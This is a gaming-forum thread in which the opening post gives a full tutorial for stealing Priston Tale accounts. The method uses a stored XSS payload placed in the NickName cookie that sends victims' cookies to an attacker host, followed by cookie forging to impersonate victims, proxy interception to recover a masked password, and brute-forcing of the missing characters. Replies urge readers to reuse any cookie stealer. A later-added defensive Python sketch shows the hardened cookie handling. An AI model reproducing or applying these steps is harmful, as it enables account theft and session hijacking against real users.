Pristontale Acc Stealing

Discussion on Pristontale Acc Stealing within the General Gaming Discussion forum part of the General Gaming category.

Old   #1
 
elite*gold: 0
Join Date: Oct 2005
Posts: 50
Received Thanks: 21
BEFORE TRYING TO FOLLOW THE TUTORIAL, SCROLL DOWN THIS PAGE FOR THE LATEST XSS BUG TO USE IT WITH. OTHERWISE IT WILL NOT WORK

I've kept this private for some while, but since lack of interests in PT, have it bitches.

This is the pack including all necessary files:


Below is the usage:
Quote:

(I (CLEARSCREEN) STRONGLY RECOMMEND YOU READ THIS ENTIRE FILE)

This document should include 5 files:
- Achilles.rar
- PTBrute04-SOURCE.rar
- PTBrute04-COMPILED.rar
- Cookie-Stealer.rar
- The README.TXT you are reading now.

I will give an explanation on how to get started quickly.
Start by unpacking Cookie-Stealer.rar, and you will notice
you have 2 files: c.php and cook.dat, the php file will
be the file that is going to store the cookies from the users
into the cook.dat file. Just upload both files somewhere
(cook.dat must be empty) and to make sure it will work set
the chmod for cook.dat to 777 (editable/readable for all).
If you really want to make sure the stealer is working,
once you have uploaded browse to
and notice if you got a line that says test in your .dat file.

Now that you have your cookiestealer setup, let's steal some cookies!
Browse to eng.pristontale.com and login with an account. This will give
us some cookies to ensure we're properly logged in. Also make sure
you are using Firefox (If you don't have it: mozilla.com),
it's very useful if we want to edit our own cookies. Right, once
you're logged in go to these menus in Firefox:
Tools => Options => Privacy => Cookies, once you're there,
click on the "Stored cookies..." button. This will open a menu.
Scroll all the way down to PristonTale.com and delete the cookie
named: NickName. Once you have done that just keep clicking OK
until you're back to the PristonTale.com page. What you just
have done is deleting the original nickname cookie to make sure
it won't bring any trouble when we create our own cookie with
the same name.

Ok, you have your cookie stealer set up, deleted your NickName
cookie, now it is time to enter our own NickName cookie, we
will do this by using JavaScript. Enter the following line
in your URL-bar: javascript:void(document.cookie='NickName=
&#60;script>top.location.href="http://site.com/c.php?c=" + document.cookie</script>')
Of course, you should edit site.com to your own hosting address.
Now our "NickName" cookie is containing a javascript that redirects
the user to our site, and sends a parameter with it, the cookie!
You can probably guess what happens, if a user looks at your nickname,
the javascript is triggered and the user is redirected to your page;
his cookie gets stolen, and he gets logged out by our script.
(to make the user redirect to eng.pristontale.com so he will think
it is a problem with the board instead of an attempt to hack his account)
Last thing you should do is disable javascript (so you don't get
redirected yourself when you're inserting the stuff in their database).
It's easy, just go to:
Tools => Options => WebFunctions => Disable Javascript.
If you did that, just browse to the Priston Tale boards, click on the
first topic you see, and just make a post with any contents you want.
Great! When a logged in user now goes to the topic, the javascript
code will be activated and soon you'll have a nice list of cookies!
(Note: You can't create a topic yourself with this method, if you
really want your own topic to "own" users, just login with another
account(use IE this time!!) and create the topic, then infect the
topic with your other account that has the NickName infection)

So! You did it all properly and you have a nice list of cookies from
users. What now? I will first explain you what the cookies stand for:
A basic cookie set (they use multiple cookies) contains these cookies:
- EUserPMNo = A unique code for each user, will look like this:
[first char of userid][some numbers]. Example: C43229
- EUserID = The user login name.
- NickName = The nickname which is required for display on the
eng.pristontale.com boards.
- EP = This is probably the password hash, I haven't been able to
decrypt it so far, maybe you can!
- ASP.NET_SessionId = Don't worry about this one, just some unique
sessionid they used for their ASP Pages.
- EBlockUser = This is what they use to display the banning messages
also not very important for what we're going to do.
- Some more unimportant stuff (mostly stuff like ECertify=checked
and PopUp=NO)
Ok, let's get down to business, what we need is the EUserPMNo and
the EUserID. Open up notepad and take these values of the victim
you want to hack.
The reason we need these things is because the EPT site will only
need these two things to log you in, it will not checksum the EP
(password) hash, if you just have the PMNo and ID you're able to
login. I'll just make up 2 examples to make it easier for you to
understand:
EUserPMNo=C23043
EUserID=Clearscreen
Now, launch up firefox again, log in to your account again, and enter
these two lines into your URL-Box again, of course again edited by you
with the correct PMNo and ID, once you press Enter it will look like
nothing happened, but something did, so don't worry about that either.
Ok here it is:
javascript:void(document.cookie='EUserID=Clearscre en')
javascript:void(document.cookie='EUserPMNo=C23043' )
When you're done just hit F5(or press the refresh button) and you'll
probably see on your left: Welcome xxxx(in my case Clearscreen).
Wow! Good security PristonTale! Now comes the tricky part which
I can't cover fully in this little tutorial. Unpack Achilles.rar
and open the Achilles file, this acts like a proxy but basically it
is able to intercept all data from the server and the client. So just
hit interception mode on and Start it. There are so many uses with this
program so I suggest you take a look at google to fully understand how
this works.
Whatever, go to the Modify > "Lost email/ID/password" page and select
E-Mail, now you will need to have some basic knowledge of Achilles,
set the proxy to localhost, and the port you configured in Achilles,
and skip that part of the retrieval page (again, use google and
look for Achilles tutorials!!!)

Wooooohoooo! You skipped the retrieval part and now the PT page will
give you some info, including the password! Hmmmmmmmm.. but there's
still something wrong, the password is provided but it is missing the
first 2 characters! Well, you can guess it sometimes, like:
dragon12 = xxagon12, but sometimes you can't. xxme ??? Lame? Game?
Fame? That's why I created the PT Bruter.

Let's take my previous example again, I managed to get to that part
of PT that provides me with the chopped off password. Unfortunately,
it says: **me. Create a file called a.txt on your desktop and fill it
in like this:
Clearscreen/me (just remove the *'s).
Save it, and then launch up the PTBrute04.exe that you could retrieve from
the PTBrute04-COMPILED.rar. Fill in the correct path to your a.txt
and press Load File! If you have done it correctly, you will see the
user in a list, together with the password in the list right next
to it. Click on the username, and select your method of cracking,
we'll go for a to z this time, because I'm guessing it won't be something
like: 34me. Then click on: "Brute that shit". And be patient! It will crack it
eventually.
I've set an interval of 3 or 4 seconds between each try, if you would choose
a to z it will take this time to crack: (NOTE: MAXIMUM TIME!!!!!)
((26*26) * 3/4) / 60 (alphabet contains 26 chars, possibilities are 26x26)
and that leaves about: 30 minutes max. If you're not satisfied with the
intervals, just change them in the source (look for the "Wait" lines)

Well, if you did it _ALL_ correctly, you should've gotten a password in
the result box of the program! You can use multiple lines in your a.txt
file too of course!

Enjoy!
- Written by clearscreen on 27th of August 2005
And here is the achilles usage:
Quote:

Ok, since some people can't find anything on google
about Achilles (hi bobo^^) I(clearscreen) decided to
write a little tutorial about this very useful application!

Note: THIS METHOD ONLY WORKS IN INTERNET EXPLORER!!!!

Ok let's get started. Login with a normal account (not hacked )
Continue to the Change Password page (just press modify) and
launch up achilles, set only these options: Intercept Client Data
and Intercept Server Data. (don't turn Intercept mode on or anything
else). Hit the run button, and set your proxy in Internet Explorer
to be 127.0.0.1 on port 5000 (default Achilles port). Now press
modify on the Pristontale page, there will be all kinds of data
on your achilles screen. Just press send without doing anything,
go back to the page and press modify again, you will receive more
data in your Achilles screen, saying something about Object moved.
Just press send again and you will probably receive new data, (if not,
you know what to do ;p Press the modify button again!!).
Ok this 3rd data page is very important, so don't just go and press
the send button! Before we do that we need to change 2 important
things in our cookie thingy's in Achilles, just change the EUserID
from your normal account to the EUserID of the user you stole the
cookies from. Do the same for the EUserPMNo, once you've done that
press the Send button in Achilles again. You will probably receive another
Object moved page, in that case hit send, if you get a large page with
all kinds of table stuff etc, you know this is the page we want.
Just select all data and paste it in notepad, the part of the password
is in this file somewhere! Hit control + f and look for **
(those characters are used to mask the 2 first characters of the original
password!). The rest of the password will be followed by those 2 **.
Example: **earscreen!

Enjoy!
ONE MAJORRRRRR THING YOU NEED TO KNOW... THIS IS EXACTLY THE SAME METHOD BUT USING ANOTHER XSS BUG.

INSTEAD OF PUTTING THE JAVASCRIPT IN THE REGISTRY PUT IT BEHIND THIS URL AND REDIRECT THE USERS TO THIS URL!!!!!!

HERE

EXAMPLE!!!!!!


INSTEAD OF THE ALERT USE THE SAME METHOD TO REDIRECT TO YOUR COOKIE STEALER!

GOOD LUCK


Clearscreen signing off :P
Thanks
1 User
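Added example (not part of the original post or of the site's code): the post depends on two server-side flaws, a NickName value rendered without output encoding and a login state taken directly from the client-writable EUserID and EUserPMNo cookies. The Python sketch below puts that flawed pattern beside a hardened form; all function names, the `sid` cookie name and the sample accounts are assumptions constructed for illustration.

```python
import html
import secrets

# Constructed in-memory session store; a real site would use its session backend.
_SESSIONS = {}


def legacy_identity(cookies):
    """Flawed pattern: identity is whatever the client-writable cookies claim."""
    return cookies.get("EUserID"), cookies.get("EUserPMNo")


def login(user_id, pm_no):
    """After a successful password check, bind the identity to a random
    server-side session. Returns (sid, Set-Cookie header)."""
    sid = secrets.token_urlsafe(32)
    _SESSIONS[sid] = (user_id, pm_no)
    # HttpOnly keeps the value out of document.cookie; Secure limits it to HTTPS.
    header = f"Set-Cookie: sid={sid}; HttpOnly; Secure; SameSite=Lax; Path=/"
    return sid, header


def hardened_identity(cookies):
    """Identity comes only from the server-side record keyed by the session id.
    EUserID / EUserPMNo cookies sent by the client are ignored."""
    return _SESSIONS.get(cookies.get("sid", ""))


def logout(sid):
    """Invalidate the session server-side so a copied sid stops working."""
    _SESSIONS.pop(sid, None)


def render_nickname(nickname):
    """Encode the nickname for an HTML text context before it is displayed."""
    return '<span class="nick">' + html.escape(nickname, quote=True) + "</span>"


if __name__ == "__main__":
    sid, header = login("alice", "A10001")  # constructed sample account
    tampered = {"sid": sid, "EUserID": "bob", "EUserPMNo": "B20002"}
    print(legacy_identity(tampered))    # trusts the edited cookies
    print(hardened_identity(tampered))  # still the logged-in account
    print(render_nickname("<script>x</script>"))
```

With identity resolved only through the server-side record, editing the EUserID and EUserPMNo cookies changes nothing, and the encoded nickname is displayed as text instead of being executed.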
Old 11/21/2005, 22:40   #2
 
elite*gold: 0
Join Date: Oct 2005
Posts: 50
Received Thanks: 21


fixed download url
Old 08/26/2008, 17:34   #3
 
elite*gold: 0
Join Date: Aug 2008
Posts: 1
Received Thanks: 0
plz can i have the files on another server than rapidshare because the download will go away after a few days
Old 08/27/2008, 16:12   #4
 
elite*gold: 81
Join Date: Jul 2005
Posts: 1,921
Received Thanks: 2,239
Quote:
Originally Posted by drolie View Post
plz can i have the files on another server than rapidshare because the download will go away after a few days
Any cookie stealer will do. Just upload it to a server and change the url to yours and embed the page somewhere so someone will click on it while he's logged in.